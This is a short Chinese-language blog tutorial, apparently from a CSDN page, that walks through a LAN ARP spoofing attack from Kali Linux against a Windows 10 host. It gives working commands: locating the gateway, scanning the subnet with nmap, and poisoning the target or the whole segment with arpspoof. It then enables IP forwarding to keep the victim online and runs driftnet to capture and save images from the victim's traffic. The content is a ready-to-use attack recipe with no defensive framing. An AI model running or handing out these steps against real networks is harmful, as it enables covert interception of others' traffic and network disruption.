局域网ARP欺骗

目录

1.找到网关IP

2.扫描局域网内的主机

3.进行ARP欺骗

4.开启端口转发

5.使用driftnet进行图片嗅探


ARP欺骗:

ARP欺骗(ARP spoofing),又称ARP毒化(ARP poisoning,网络上多译为ARP病毒)或ARP攻击,是针对以太网地址解析协议(ARP)的一种攻击技术,通过欺骗局域网内访问者PC的网关MAC地址,使访问者PC错以为攻击者更改后的MAC地址是网关的MAC,导致网络不通。此种攻击可让攻击者获取局域网上的数据包甚至可篡改数据包,且可让网络上特定计算机或所有计算机无法正常连线。

环境:

kali:10.xx.xx.2    win10:10.xx.xx.189

1.找到网关IP

# route -n

2.扫描局域网内的主机

nmap 10.xx.xx.0/24

3.进行ARP欺骗

# arpspoof -i eth0 -t 10.xx.xx.1 10.xx.xx.189      //arpspoof -i 网卡 -t 目标网关 目标主机

注:如果不指定目标地址即攻击整个网段 如 arpspoof -i eth0 10.xx.xx.xx (网关地址) 此时将会攻击网关地址所在网段

此时目标主机将无法访问网络

4.开启端口转发

# echo 1 > /proc/sys/net/ipv4/ip_forward
//kali linux默认是不开启ip转发的,所以我们这里手动开启,关于ip转发的配置文件写在/proc/sys/net/ipv4的ip_forward中,默认为0(不转发),我们改成1(为1的话目标不会断网)

5.使用driftnet进行图片嗅探

# driftnet -i eth0     //Driftnet是一个监听网络流量并从它观察到的TCP流中提取图像的程序
# driftnet -i eth0 -a -d /root/lql  将嗅探到的图片保存到/root/lql目录下

  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

安名然

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值